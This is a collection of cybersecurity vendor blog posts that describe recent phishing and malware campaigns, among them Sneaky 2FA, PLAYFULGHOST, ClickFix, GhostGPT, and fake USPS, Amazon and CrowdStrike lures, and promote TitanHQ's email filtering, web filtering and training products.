As with a standard phishing attack, phishing emails are sent to individuals to trick them into visiting a phishing page. One campaign using the Sneaky 2FA phishing kit uses payment receipt-related emails to trick the recipient into opening a PDF file attachment that has a QR code directing the user to a Sneaky 2FA page on a compromised website, usually a compromised WordPress site. These pages have a blurred background and a login prompt. Microsoft 365 credentials are required to access the blurred content. The phishing pages automatically add the user’s email address to the login prompt, so they are only required to enter their password. To evade detection, multiple measures are employed such as traffic filtering, Cloudfire Turnstile challenges, and CAPTCHA checks.

Many phishing kits use reverse proxies for handling requests; however, the Sneaky 2FA phishing server handles communications with Microsoft 365 API directly. If the checks are passed, JavaScript code is used to handle the authentication steps. When the password is entered, the user is directed to the next page, and the victim’s email address and password are sent to the phishing server via an HTTP Post. The server responds with the 2FA method for the victim’s account and the response is sent to the phishing server. The phishing kit allows session cookies to be harvested that provide account access, regardless of the 2FA method – Microsoft Authenticator, one-time password code, or SMS verification.

Phishing kits such as Sneaky FA make it easy for cybercriminals to conduct phishing attacks and defeat MFA; however, they are not effective at defeating phishing-resistant MFA such as FIDO2, WebAuthn, or biometric authentication. The problem is that these forms of MFA can be expensive and difficult to deploy at scale.

Businesses can greatly improve their defenses with advanced spam filter software with AI- and machine learning detection, email sandboxing, URL rewriting, QR code checks, greylisting, SPF, DKIM, and DMARC checks, and banners identifying emails from external sources. Effective email filtering will ensure that these malicious emails do not land in employee inboxes. TitanHQ offers two email security solutions – SpamTitan email security and the PhishTitan anti-phishing solution for M365. The engine that powers both solutions was recently rated in 1st place for protection in the Q4, 2024 tests by VirusBulletin, achieving a 100% malware and 100% phishing detection rate.

Regular security awareness training should also be provided to all members of the workforce to raise awareness of threats and to teach cybersecurity best practices. With the SafeTitan security awareness training platform it is easy to create and automate training courses and add in new training content when new threat actor tactics are identified. The platform also includes a phishing simulator for reinforcing training and identifying individuals in need of additional training.

For more information on improving your defenses against phishing and malware, give the TitanHQ team a call. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.

Dangerous New Information Stealer Distributed via Phishing and SEO Poisoning

A new malware variant called PLAYFULGHOST has been discovered that is being distributed via phishing emails and websites that appear high in search engine listings through black hat search engine optimation (SEO) tactics.

PLAYFULGHOST was analyzed by Google’s Mandiant Managed Defense team, which confirmed the malware had extensive information-stealing capabilities. They include keylogging, taking screenshots, recording audio, copying information from the clipboard, stealing QQ account information, and collecting information on the installed security solutions and system metadata. The malware can also block mouse and keyboard inputs, clear Windows event logs, delete caches and profiles from web browsers, erase profiles and delete local storage for messaging apps,  and the malware has file transfer capabilities and can download additional payloads. The malware achieves persistence in four ways –registry keys, scheduled tasks, establishing itself in a Windows service, and through entries in the Windows Startup folder. In short, PLAYFULGHOST is a highly capable and very dangerous new malware variant.

An analysis of the distribution methods identified SEO poisoning, where websites are promoted so they appear high in the search engine listings for search terms related to Virtual Private Network solutions, including the legitimate LetsVPN solution. If a user visits the webpage, they can download the LetsVPN installer; however, it has been trojanized to silently load PLAYFULGHOST in the memory via an interim payload. Phishing is also used to distribute the malware. While multiple lures could be used in this campaign, intercepted emails had code-of-conduct-related lures to trick the recipient into opening a malicious RAR archive that includes a Windows executable file that downloads and executes the malware from a remote server.

If infected with the malware, detection can be problematic since the malware runs in the memory, and multiple persistence mechanisms can make malware removal challenging. It is vital that infection is prevented and that requires multiple measures since the malware is distributed in different ways. To protect against malware delivery via SEO poisoning and malvertising, businesses should use a web filter and provide regular security awareness training to the workforce. The WebTitan DNS filter is a web filtering solution that protects against web-delivered malware in a variety of ways. WebTitan is fed extensive up-to-the-minute threat intelligence on malicious websites and domains and will prevent users (on and off the network) from visiting those malicious websites. That includes visits to websites through web browsing and redirects through malvertising.

WebTitan can be configured to block certain downloads from the Internet by file extension, such as installers and other executable files. In addition to preventing malware delivery, this feature can be used to control shadow IT – software installations that have not been authorized by the IT department. WebTitan can also be used to control the web content that employees can access, by blocking access to web content that serves no work purpose along with risky categories of websites.

Security awareness training is vital for making employees aware of the risks of malware downloads from the Internet. Employees should be instructed not to download software from unofficial websites, warned of the risks of malvertising, and told not to trust a website simply because it is positioned high in the search engine listings. Employees should also be warned of the risk of phishing, be taught how to identify a phishing attempt, and be conditioned to report suspicious emails to their security team. A phishing simulator should also be used to reinforce training and identify individuals who are susceptible to phishing so they can be provided with additional training. TitanHQ’s SafeTitan security awareness training and phishing simulation platform makes this as easy as possible, automating the delivery of training and phishing simulation exercises.

TitanHQ offers two powerful anti-phishing solutions – PhishTitan for Microsoft 365 users and SpamTitan anti-spam software. Both are powered by the same advanced engine that was recently assessed by VirusBulletin, and confirmed to block 100% of malware, 100% of phishing emails, and 99.999% of spam emails in Q4 tests. The incredibly strong performance earned TitanHQ top spot out of all the leading solutions under test. The strong anti-malware performance was due to twin (signature-based) antivirus engines and cutting-edge behavioral protection with email sandboxing.

With new, stealthy malware variants constantly being released, and cybercriminals developing highly sophisticated AI-based phishing campaigns, businesses need to ensure they have cybersecurity solutions capable of identifying and blocking the threats. With TitanHQ as your cybersecurity partner, you will be well protected against ever-evolving cyber threats. Give the TitanHQ team a call today for further information on bolstering your malware and phishing defenses or put these solutions to the test in a free trial.

Beware of Tax Season Phishing Scams

In the United States, tax returns for the previous year need to be filed before Tax Day, which falls on Tuesday, April 15, 2025.  Tax season officially started on January 27, 2025, when the Internal Revenue Service (IRS) started accepting tax returns for 2024. Tax season is a popular time for cybercriminals who take advantage of individuals and businesses that are under pressure to file their annual tax returns and try to steal personal information to file fraudulent tax returns in victims’ names and for other nefarious purposes.

Cybercriminals use tried and tested methods for their scams, but over the past few years, the scams have become more sophisticated. There has been a significant increase in the use of AI tools to craft highly convincing phishing emails. Phishing is one of the most common ways that cybercriminals trick people into disclosing sensitive information during tax season. One of the most common phishing techniques in tax season involves impersonation of the IRS. Emails are sent that appear to have come from an official IRS domain, the contact information in the email may be 100% correct, and the emails contain the IRS logo. The lures used in these scams include fake offers of tax refunds with rapid payment, legal threats, and criminal charges for tax fraud. These scams tempt or scare people into visiting a website linked in the email or calling a telephone number provided in the email.

The website to which the user is directed mimics the official IRS site and social engineering techniques are used to get the user to disclose sensitive information. That information is rapidly used to file a fraudulent tax return, with the victim only discovering they have been scammed when they file their tax return and are notified by the IRS that it is a duplicate. Alternatively, they are told that they must pay outstanding tax immediately and are threatened with fines and criminal charges if they fail to do so. Scams promising a tax return require personal information and bank account details to be disclosed.

Businesses are targeted in a variety of tax season scams, with one of the most common being fake tax services. Filing tax returns can be a time-consuming and arduous process, so tax filing services that do all of the work are an attractive choice. Businesses may be contacted via email, telephone, or could be directed to these scam services via the Internet. Businesses are tricked into providing personal and financial information, which could be used to file a fraudulent tax return. Commonly, the aim is to trick the business into downloading malware onto their device. These services may lure victims by promising quick tax refunds, which can be attractive for cash-strapped businesses.

According to the IRS, last year taxpayers lost $5.5 billion to tax scams and fraud so vigilance is key during tax season. Be aware that cybercriminals are incredibly active during tax season, and any offer that seems too good to be true most likely is. The IRS will not initiate contact via email or text message, as initial contact is typically made via the U.S. Postal Service, and emails and text messages are only sent if the IRS has been given permission to do so. The IRS will not make contact via social media, does not accept gift cards as payment, does not use robocalls, and does not threaten to call law enforcement or immigration officials.

Businesses should ensure they have anti-spam software to catch and neutralize phishing threats; however, not all spam filtering services are equal. Spam filters will perform a range of checks on inbound email, including reputation checks of the sender’s domain and email address, anti-spoofing checks, checks of blacklists of malicious IP addresses, and the email content will be assessed for malicious links, common signatures of phishing, and email attachments will be checked using anti-virus software. While these methods will identify the vast majority of spam emails and many phishing attempts, these checks are no longer sufficient.

The best spam filter for business is an advanced solution that has AI and machine learning capabilities for detecting advanced phishing scams and AI-generated threats. To catch and block AI-generated threats you need AI in your defenses. SpamTitan is an advanced cloud-based anti-spam service from TitanHQ (an anti-spam gateway is also available) that performs all of the standard checks mentioned above, scans emails with twin anti-virus engines, and uses machine-learning-based detection to identify the threats that many other spam filtering software solutions miss. If initial checks are passed, emails are sent to an email sandbox for deep analysis. With email sandboxing, attachments are assessed in a safe environment and their behavior is analyzed in depth, allowing novel malware to be identified and links are followed and assessed for malicious content.

SpamTitan consistently outperforms other leading email security solutions and, in the latest round of independent tests at VirusBulletin, SpamTitan was ranked in first place due to unbeatable detection rates, having blocked 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. This tax season, ensure you have the best email protection for your business by using SpamTitan. Call TitanHQ for more information, to arrange a product demonstration, or sign up for a free trial to see for yourself how effective SpamTitan is at blocking email threats.

AI-Generated Voice Phishing Calls Combined with Email to Steal Gmail Credentials

Cybercriminals often devise phishing lures that can be used on as many individuals as possible, which is why they often impersonate big-name brands such as Microsoft, Apple, Facebook, and Google, since there is a high percentage chance that the emails will land in the inbox of someone that uses the products of those companies.

In the case of Google, a phishing campaign targeting Gmail account holders makes sense from the perspective of a cybercriminal as there are around 2.5 billion Gmail users worldwide. One such campaign has recently been identified that uses a combination of an email and a phone call to obtain account credentials. Email accounts can contain a wealth of sensitive information that can be misused or used in further attacks on an individual, and the accounts can be used for phishing and spear phishing campaigns.

Phishing campaigns that combine multiple communication methods are becoming more common, such as callback phishing. With callback phishing, the scam starts with an email devoid of malicious links, scripts, and attachments. The recipient is told that a charge will be applied to their account for a subscription or free trial that is coming to an end. The user is informed that they must call the number in the email to terminate the subscription before the charge is applied. If the number is called, the threat actor uses social engineering techniques to trick the user into downloading a remote access solution to remove the software and prevent the charge. The software gives the threat actor full control of their device.

The latest campaign uses emails and phone calls in the opposite order, with initial contact made via the phone by a person impersonating the Google support team. The reason for the phone call is to advise the Gmail user that their account has been compromised or suspended due to suspicious activity, or that attempts are being made to recover access.

One user received a call where a Google customer support worker told them that a family member was trying to gain access to their account and had provided a death certificate. The call was to verify the validity of the family member’s claim. People targeted in this campaign may attempt to verify the validity of the call by checking the phone number; however, Caller ID is spoofed to make it appear that the call has come from a legitimate Google customer support number.

The second phase of the scam includes an email sent to the user’s Gmail account corroborating the matter discussed in the phone call, with the email requiring action to recover the account and reset the password. A link is provided that directs the user to a spoofed login page where they are required to enter their credentials, which are captured by the scammer. There have also been reports where initial contact is made via email, with a follow-up telephone call.

Performing such a scam at scale would require a great deal of manpower, and while telephone scams are commonly conducted by call center staff in foreign countries, this scam involves AI-generated calls. The caller sounds professional and polite and has a native accent, but the victim is not conversing with a real person. The reason for the call is plausible, the voice very realistic, and the scam is capable of fooling even security-conscious individuals.

Businesses looking to improve their defenses against advanced phishing scams should ensure that they cover these types of sophisticated phishing attempts in their security awareness training programs. Employees should be told that threat actors may use a variety of methods for contact, often combining more than one communication method in the same scam. Keeping employees up to date on the latest tactics used by scammers is straightforward with the SafeTitan security awareness training platform. New training content can easily be created in response to changing tactics to keep the workforce up to date on the latest scams. SafeTitan also includes a phishing simulator for reinforcing training.

An advanced email security solution is also strongly recommended for blocking the email-based component of these sophisticated phishing scams. SpamTitan cloud based anti spam software incorporates machine learning capable of identifying previous unseen phishing scams, ensuring phishing attempts are blocked and do not land in inboxes. In recent independent tests at VirusBulletin, SpamTitan achieved the top spot due to comprehensive detection rates, blocking 100% of malware and phishing emails, and 99.999% of spam emails. To block sophisticated AI-generated phishing attempts you need sophisticated AI-based defenses. Give the TitanHQ team a call today to find out more about improving your defenses against AI-based attacks.

Clickfix Attacks on the Rise – Are You Protected?

Cybercriminals are increasingly conducting a type of social engineering technique dubbed ClickFix to gain persistent access to victims’ networks. ClickFix attacks involve social engineering to trick the victim into installing malware. ClickFix attacks were first identified in early 2024, and the use of this tactic has been increasing. These attacks take advantage of users’ desire to quickly resolve IT issues without having to inform their IT department. Resolving issues can take time, and usually involves raising a support ticket with the IT department. In ClickFix attacks, the threat actor warns the user about a fake IT issue, often providing some evidence of that issue, and offers a quick and easy solution.

The aim of these attacks is to trick the user into running a PowerShell command, which will ultimately deliver malware to their device. Campaigns have been conducted by threat actors distributing the Lumma information stealer, the Danabot banking trojan/information stealer, the AsyncRAT remote action trojan, and the DarkGate loader, although any number of malware variants could be delivered using this technique. Multiple threat groups have been observed using this technique.

The methods used to get the user to run the malicious PowerShell command are varied, with the deception occurring via email, the Internet, or a combination of the two. Threat actors have been observed conducting phishing ClickFix attacks involving emails with HTML attachments disguised as Microsoft Word documents. The attachments display a fake error message, the resolution of which requires copying and executing a malicious PowerShell command.

Malicious links have been distributed in phishing emails that direct users to sites impersonating software solutions such as Google Meet and PDFSimpli, the Chrome web browser, social media platforms such as Facebook, and transport and logistics companies. Threat actors also use stolen credentials to compromise websites where they create pop-ups, which appear when visitors land on the site warning them about a fictitious security issue. Fake CAPTCHA prompts are often used, where the user is told they must verify that they are human before being allowed to proceed. As part of the verification process, a command is copied to the clipboard, and the user is told to press the Windows key + R, then CTRL + V, and then enter, thus executing the script and triggering a malware download. Security researchers have identified multiple threat actors using this technique, including Russian espionage actors in targeted attacks on Ukrainian companies and many different financially motivated cybercriminal groups.

To defend against Clickfix attacks, businesses need to implement multiple mitigations to prevent these attacks from succeeding, the most important of which are security awareness training, an advanced spam filter, and a web filtering solution. Regular security awareness training should be conducted to improve understanding of the phishing and social engineering techniques used by threat actors, including specific training content to teach employees how to identify and avoid clickfix attacks. TitanHQ offers a comprehensive training platform called SafeTitan that allows businesses to easily create security awareness training programs tailored to individuals and user groups, and rapidly roll out additional training material when a new threat is identified. SafeTitan also includes a phishing simulator to test employee responses to simulated clickfix attacks.

An advanced spam filter is essential for blocking malicious emails. TitanHQ’s SpamTitan suite of solutions includes a spam filter for Office 365, a gateway spam filter, and the most popular choice, a cloud based anti spam service. SpamTitan conducts an extensive array of tests to identify spam and malicious emails, including reputation checks, checks of embedded hyperlinks, email sandbox behavioral analysis, and AI/machine learning to identify the threats that bypass many email security solutions. In recent tests, SpamTitan outperformed all other tested email security solutions with a 100% malware and phishing catch rate, and a 99.999% spam catch rate.

Web filtering solutions should be used to protect against the web-based component of clickfix attacks since initial contact is not always made via email. The WebTitan DNS filter prevents access to known malicious websites, such as the attacker-controlled webpages used in clickfix attacks. WebTitan can also prevent downloads of certain file extensions from the Internet and can also be used to control the categories of websites that employees can visit.

With regular security awareness training, email security, and web security delivered through SafeTitan SpamTitan, and WebTitan, businesses will be well protected from Clickfix attacks. Call TitanHQ today to find out more or take advantage of a free trial of these solutions.

New Malware and Phishing-Focused AI Chatbot Highlights Need for AI-Aided Defenses

A new AI chatbot has been released specifically for use by cybercriminals that has been developed to assist with malware development, phishing campaigns, and business email compromise attacks. The new chatbot is called GhostGPT, and follows the release of WormGPT, WolfGPT, and EscapeGPT which are also aimed at cybercriminals and lack the restrictions of ChatGPT and other publicly available chatbots which will not generate responses to queries related to criminality. GhostGPT is thought to connect to a jailbroken open-source large language model (LLM), ensuring queries are not subject to censorship. The tool is offered on Telegram and for a fee, the tool can be immediately used.

There is growing evidence that cybercriminals are using AI tools for malware development, phishing/spear phishing, and business email compromise and there is considerable interest in these tools in the cybercriminal community. These tools can open up new types of attacks to low-skilled cybercriminals, as well as help skilled cybercriminals conduct attacks at an accelerated rate and bypass security solutions. These tools can be used to write malware code with extensive capabilities, dramatically reducing the time required for malware development. Phishing emails can be crafted in multiple languages with perfect grammar and spelling. AI tools are being used to slash the time taken to research individuals for spear phishing and BEC attacks and can even generate emails likely to be of interest to recipients. A recent study demonstrated that humans are not good at identifying AI-generated phishing emails. The researchers found their AI-generated emails had a 54% click rate.

These tools allow rapid development of malware from scratch and cybercriminals can easily spin up multiple malware versions capable of defeating signature-based detection. Phishing and BEC emails can easily fool targeted individuals as they lack the common signs of malicious emails that employees are taught to look for and the level of personalization of emails can be increased with little effort, making it easy for cybercriminals to scale up their spear phishing and BEC campaigns.

Malicious use of LLMs is a genuine cause for concern. Businesses need to respond to these fast-evolving threats by improving their cybersecurity defenses. Since these attacks are predominantly conducted via email, robust email defenses are a must. To defeat AI-generated phishing emails, businesses need to ensure they incorporate AI in their defenses and email security solutions need more than signature-based detection to identify and block malware.

SpamTitan, TitanHQ’s spam filtering service, incorporates AI and machine learning algorithms to identify the malicious AI-generated emails that many spam filtering solutions fail to block. SpamTitan also includes a next-generation email sandbox, where emails are sent for extensive analysis to identify threats from their behavior rather than their signature. In the Q4, 2024, tests by VirusBulletin, the engine that powers SpamTitan and TitanHQ’s Microsoft 365 anti-phishing solution – PhishTitan – ranked first for overall score, outperforming all other leading email filtering solutions under test. TitanHQ achieved a 100% malware catch rate, 100% phishing catch rate, and 99.999% spam catch rate, with a 0.000% false positive rate.

The high percentage of individuals fooled by ai-generated phishing emails highlights the importance of conducting regular security awareness training. Employees must be kept aware of the latest threats and tactics used by cybercriminals, and training should be reinforced with phishing simulations. Phishing simulations have been proven to make training more effective and highlight the individuals who are failing to apply their training to the emails they receive on a daily basis. The SafeTitan security awareness training platform and phishing simulator make it easy to spin up training courses, keep employees up to date on the current threat landscape, and automate phishing simulations.

Speak with the TitanHQ team today to discuss your options for improving your defenses against phishing and malware. TItanHS’s solutions are available on a free trial and product demonstrations can be arranged on request.

New Phishing Campaigns Impersonate Amazon Prime and the US Postal Service

New phishing schemes are constantly developed by threat actors to trick people into disclosing sensitive information or downloading malicious files that provide the attacker with remote access to their devices. This month, two campaigns have been identified that use PDF files to hide the phishing content from email security solutions, one of which uses a lure of expired Amazon Prime memberships, and the other impersonates the US Postal Service and advises the recipient about a failed delivery.

Amazon Prime Phishing Campaign

The emails in this phishing campaign appear to have been sent by Amazon Prime and include a PDF file attachment. The PDF file advises the recipient that their membership is due to expire on a specified date; however, the card Amazon has on file is no longer valid. In order to continue with the membership, new card details must be supplied; however, attempts will first be made to charge the membership to all other cards on the account. Users are warned that if payment is not made, the account will be suspended.

Due to the huge number of Amazon Prime members, the emails have a good chance of landing in the inbox of an Amazon Prime subscriber; however, anyone who has previously had an Amazon Prime membership may be tricked into following the link in the PDF to ensure that the cards on file will not be charged.

If the link is clicked, the user is directed to a URL (a duckdns.org subdomain) that displays an exact copy of the Amazon sign-in page. If they attempt to log in, they are asked to secure their account by confirming their identity and are told to sign out of all web apps, devices, and web browsers. The “Verify Your Identity” page asks for their full name, date of birth, Social Security number, phone number, and full address. They are then taken to a page where they are asked to enter their payment card information. In addition to fraudulent charges to their card, the theft of personal information puts victims at risk of identity theft.

US Postal Service Phishing Campaign

A large-scale phishing campaign is being conducted impersonating the US Postal Service that similarly uses malicious PDFs. This campaign specifically targets mobile devices with the aim of harvesting personal information. More than 630 phishing pages have been identified as part of this campaign targeting individuals in more than 50 countries. The PDF files use a novel technique for hiding the phishing URL from email security solutions, making it harder to identify and extract the URL for analysis.

Text messages are sent that advise the recipient that a package has arrived at a USPS distribution center; however, the package cannot be delivered due to incomplete address information. A link is included to a web-hosted PDF file that the recipient is told they must click to complete the address information. The link directs the user to a phishing page, where they must enter their full address, email address, and contact telephone number into the form. They are then asked to pay a small service charge for redelivery – $0.30 – and must submit their card details.

Improve Your Phishing Defenses

These are just two examples of new phishing campaigns that use PDF files to hide phishing links from email security solutions. PDF files are commonly used for this purpose as they can contain clickable links, scripts, and even malicious payloads. What makes the attacks even more effective is when they target mobile devices, which have smaller screens that make it harder to view the URL, thus making it easier to hide a domain unrelated to the company being impersonated. Mobile devices also tend to have weaker security than desktop computers and laptops.

Businesses should ensure they conduct regular security awareness training to teach cybersecurity best practices, warn employees about cyber threats, and teach the skills needed to identify phishing and social engineering attempts. Training should be an ongoing process and should include the latest scams and new techniques used by cybercriminals to target employees, especially campaigns targeting mobile devices as malicious text messages are harder to block than malicious emails. An advanced email security solution should be implemented that has AI and machine learning capabilities, and email sandboxing to analyze emails and attachments in-depth to identify malware, malicious scripts, and embedded hyperlinks.

TitanHQ can help in both of these areas. SafeTitan is a comprehensive security awareness training platform that makes it easy to create and automate security awareness training for the workforce. The platform includes a phishing simulator for conducting internal phishing campaigns to reinforce training and identify individuals who are susceptible to phishing attempts.

TitanHQ’s cloud-based anti-spam service – SpamTitan is an advanced email security solution for blocking the full range of email threats including phishing, spear phishing, business email compromise, and malware. In independent tests, SpamTitan achieved 1st spot for detection, blocking 100% of phishing attempts, 100% of malware, and 99.999% of spam emails, with a 0.000% false positive rate.

For more information on cloud-based email filtering and attachment and message sandboxing with SpamTitan and security awareness training and phishing simulations with SafeTitan, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial, and MSP-focused solutions are available to easily add advanced anti-phishing and security awareness training to service stacks.

AI-Generated Phishing Emails Trick More Than 50% of Recipients

Large language models (LLMs) are used for natural language processing tasks and can generate human-like responses after being trained on vast amounts of data. The most capable LLMs are generative pretrained transformers, or GPTs, the most popular of which is ChatGPT, although there are many others including the China-developed DeepSeek app.

These AI-powered tools have proven incredibly popular and are used for a wide range of tasks, eliminating a great deal of human effort. They are used for creating articles, resumes, job applications, and completing homework, translating from one language to another, creating summaries of text to pull out the key points, and writing and debugging code to name just a few applications.

When these artificial intelligence tools were released for public use, security professionals warned that in addition to the beneficial uses, they could easily be adopted by cybercriminals for malicious purposes such as writing malware code, phishing/spearphishing, and social engineering.

Guardrails were implemented by the developers of these tools to prevent them from being used for malicious purposes, but those controls can be circumvented. Further, LLMs have been made available specifically for use by cybercriminals that lack the restrictions of tools such as ChatGPT and DeepSeek.

Evidence has been growing that cybercriminals are actively using LLMs for malicious purposes, including writing flawless phishing emails in multiple languages. Human-written phishing emails often contain spelling mistakes and grammatical errors, making them relatively easy for people to identify but AI-generated phishing emails lack these easily identified red flags.

While cybersecurity professionals have predicted that AI-generated phishing emails could potentially be far more effective than human-generated emails, it is unclear how effective these AI-generated messages are at achieving the intended purpose – tricking the recipient into disclosing sensitive data such as login credentials, opening a malicious file, or taking some other action that satisfies the attacker’s nefarious aims.

A recently conducted study set out to explore how effective AI-generated spear phishing emails are at tricking humans compared to human-generated phishing attempts. The study confirmed that AI tools have made life much easier for cybercriminals by saving them a huge amount of time. Worryingly, these tools significantly improve click rates.

For the study, researchers from Harvard Kennedy School and Avant Research Group developed an AI-powered tool capable of automating spear phishing campaigns. Their AI agents were based on GPT-4o and Claude 3.5 Sonnet, which were used to crawl the web to identify information on individuals who could be targeted and to generate personalized phishing messages.

The bad news is that they achieved an astonishing 54% click-through rate (CTR) compared to a CTR of 12% for standard phishing emails. In a comparison with phishing emails generated by human phishing experts, a similar CTR was achieved with the human-generated phishing emails; however, the human version cost 30% more than the cost of the AI automation tools.

What made the phishing emails so effective was the level of personalization. Spear phishing is a far more effective strategy than standard phishing, but these attacks take a lot of time and effort. By using AI, the time taken to obtain the personal information needed for the phishing attempt and develop a lure relevant to the targeted individual was massively reduced. In the researchers’ campaign, the web was scraped for personal information and the targeted individuals were invited to participate in a project that aligned with their interests. They were then provided with a link to click for further information. In a genuine malicious campaign, the linked site would be used to deliver malware or capture credentials.

AI-generated phishing is a major cause of concern, but there is good news. AI tools can be used for malicious purposes, but they can also be used for defensive purposes and can identify the phishing content that humans struggle to identify. Security professionals should be concerned about AI-generated phishing, but email security solutions such as SpamTitan can give them peace of mind.

SpamTitan, TitanHQ’s cloud-based anti-spam service, has AI and machine learning capabilities that can identify human-generated and AI-generated phishing attempts, and email sandboxing for detecting zero-day malware threats. In recent independent tests, SpamTitan outperformed all other email security solutions and achieved a phishing and malware catch rate of 100%, a spam catch rate of 99.999%, with a 0.000% false positive rate. When combined with TitanHQ’s security awareness training platform and phishing simulatorSafeTitan, security teams will be able to sleep easily.

For more information about SpamTitan, SafeTitan, and other TitanHQ cybersecurity solutions for businesses and managed service providers, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial and product demonstrations can be arranged on request.

That Recruitment Email Could be A Phishing Attempt

A scam has recently been identified that impersonates the CrowdStrike recruitment process and tricks recipients into downloading the XMRig cryptocurrency miner. Initial contact is made via email, with the email using CrowdStrike branding offering an Interview with the company.

The emails claim that the next phase of the hiring process is a 15-minute call with the hiring team; however, this year, the company is rolling out a new applicant and employee CRM app. The recipient is instructed to click the employee CRM application button, which triggers the download of a fake application for scheduling the interview. Recipients are given the option of downloading a Windows or MacOS version of the application; however, the downloaded file is an XMRig installer. When executed, checks are performed of the environment to determine if a debugger is attached to the process, the device is checked to ensure it has two cores and is suitable for cryptocurrency mining, and checks are performed to identify virtualization and running processes to prevent execution in a sandbox environment. If the checks are passed, a copy of XMRig is downloaded from GitHub and executed. If the checks are passed, the user is presented with an error message, advising them that the installation has failed, potentially due to a hardware compatibility issue. The user is told to try again by downloading the application on another device, potentially infecting a second device with XMRig.

Jobseekers are often targeted in phishing scams. In the hunt for a job, they can be susceptible to phishing attempts, forgetting their security awareness training in the hope of landing an exciting new position. Fraudsters often claim to be recruitment agents who have identified individuals for a lucrative job and may even claim that the job is theirs based on information found on professional networking sites or from headhunting activities. According to the Better Business Bureau, recruitment scams result in losses of around $2 billion each year, and these scams are becoming more common.

The scammers often seek personal information and usually require the payment of a nominal charge for job placement or training, or in this case, the goal is malware delivery. Initial contact may be made via email to a personal email address; however, this could easily result in malware being installed on a corporate-owned device. As with all phishing attempts, vigilance is key. Regardless of the subject of an email or the offer or threat contained therein, all emails should be subject to checks to assess the authenticity of the email.

For businesses, TitanHQ offers a comprehensive security awareness training platform for training workforce members on cybersecurity best practices and common threats. The platform includes hundreds of computer-based training modules covering all aspects of security. The training modules are no longer than 10 minutes, are enjoyable and engaging, and can be easily combined into training courses tailored for job roles or individuals. New content is frequently added in response to changing tactics, techniques, and procedures of threat actors to keep employees up to date on the threats they are likely to encounter.

The platform also includes a phishing simulator for assessing the effectiveness of training and identifying individuals who are susceptible to phishing attempts to ensure they receive the additional training they need. Through regular security awareness training and phishing simulations using the SafeTitan platform, businesses have been able to make measurable improvements to their human defenses, reducing susceptibility to phishing attempts by up to 80%. If you have yet to implement a security awareness training program or your employees are still falling for phishing attempts, give the TitanHQ team a call about the SafeTitan platform.

Is Better Phishing Protection One of Your New Year Resolutions?

Various analyses indicate there has been a significant increase in phishing attacks in 2024, with one study revealing that 94% of organizations experienced at least one phishing attack in 2024, two percentage points higher than the previous year. The majority of those organizations suffered bad consequences as a result of those attacks.

Phishing attacks are not only increasing in volume, they are also increasing in sophistication and AI tools are making phishing attempts much harder to identify. AI tools are being used to slash the amount of time taken to conduct research for spear phishing attacks, including using these tools to create lures that the targeted individuals are likely to respond to. AI tools are being used to create grammatically perfect emails, even matching the writing style of the impersonated company or individual. There has also been an increase in multi-channel attacks, where phishers combine email, text messages, and the telephone in their scams.

In the United States, the Federal Bureau of Investigation’s Internet Crime Complaint Center publishes annual reports about complaints about cybercrime, with this year’s report showing almost 300,000 reports of phishing-related cybercrime, not including cyberattacks such as ransomware attacks that started with phishing emails. Across the Atlantic, in the UK it was a similar story, with the Information Commissioner’s Office also reporting and increase in complaints related to phishing.

With the increase in attacks, use of AI tools, and rising data breach costs, it is no surprise that phishing is one of the biggest causes of stress for cybersecurity professionals. With the New Year rapidly approaching, now is the perfect time to ease the stress by enhancing your defenses and strengthening your email security posture, and one of the best ways to do that is with an improved email security solution capable of identifying and blocking even sophisticated threats.

At TitanHQ, we are continuously making improvements to the engine at the heart of our antispam software (SpamTitan) and anti-phishing solution (PhishTitan) to improve detection and usability. The latest release is the most powerful yet with AI and machine learning capabilities and email sandboxing for exceptional malware detection. The engine has been shown to be highly effective in independent tests by the highly respected independent computer security company VirusBulletin.

VirusBulletin put the engine that powers the SpamTitan and PhishTitan solutions to the test along with 10 leading email security solutions and awarded it joint first place for overall score in the Q3, 2024 tests, and first place in the Q4,2024 tests. For the third consecutive quarter, TitanHQ achieved a 100% malware catch rate, and the phishing catch rate increased from 99.99% in Q2 to 100% in Q4, with a Q4 spam catch rate of 99.99% and a 0.00% false positive rate. The strong performance has earned TitanHQ its third consecutive VBSpam+ award. SpamTitan and PhishTitan are very competitively priced and it is easy to switch from alternative email security solutions. Given the amazing catch rates, ease of use, and competitive pricing, it should come as no surprise that record numbers of companies are making the switch to TitanHQ to improve their phishing defenses.

Technical defenses are important for blocking threats, but it is also important that your workforce is trained to recognize phishing and other security threats. The workforce needs to be provided with regular training sessions to reinforce security best practices and make them aware of the threats they are likely to encounter. Through regular training, you can develop a security culture and ensure that employees will be able to detect, avoid, and report any threats landing in their inboxes.

The easiest way to improve security awareness is with a comprehensive training platform such as SafeTitan. SafeTitan is an easy-to-use training platform with hundreds of training modules covering all aspects of security that is used by businesses to teach security best practices and raise awareness of common and not-so-common threats. Training courses can easily be created for different users, job roles, and threat levels, and the training can be automated to provide hands-off training continuously throughout the year. The platform can be configured to automate the delivery of relevant training in response to security errors, and the phishing simulator can be used to conduct internal campaigns to reinforce training and identify areas where training needs to be improved.

Why not get 2025 off to the perfect start by improving your phishing defenses with TitanHQ? Give the team a call today to discuss these solutions in more detail and take advantage of a free trial of these solutions to see for yourself the difference they make to your phishing defenses.

AI Tools Used to Research Executives in Targeted Phishing Campaigns

It used to be relatively easy to spot a phishing attempt. Phishing emails would have poor grammar and be littered with spelling mistakes, with relatively easy-to-identify lures such as too-good-to-be-true offers. The unsolicited emails would be sent from unknown email addresses in huge volumes, as threat actors knew they were good enough to fool enough recipients and make the campaigns worthwhile. Provided employees had a modicum of security awareness training and took time to carefully read emails, the phishing attempts could be easily identified and avoided.

Phishing has been growing in sophistication and while these poorly constructed emails are not exactly a thing of the past, there is now a new breed of phishing emails that are expertly written, contain no errors, and are highly personalized to maximize the probability of getting the desired response. In order to conduct a highly personalized spear phishing campaign, threat actors need to spend a considerable amount of time researching their intended targets. In order to warrant that amount of time, the potential rewards must be high. These campaigns are usually conducted on high-value targets such as C-suite members by well-resourced threat actors, such as state-sponsored hacking groups.

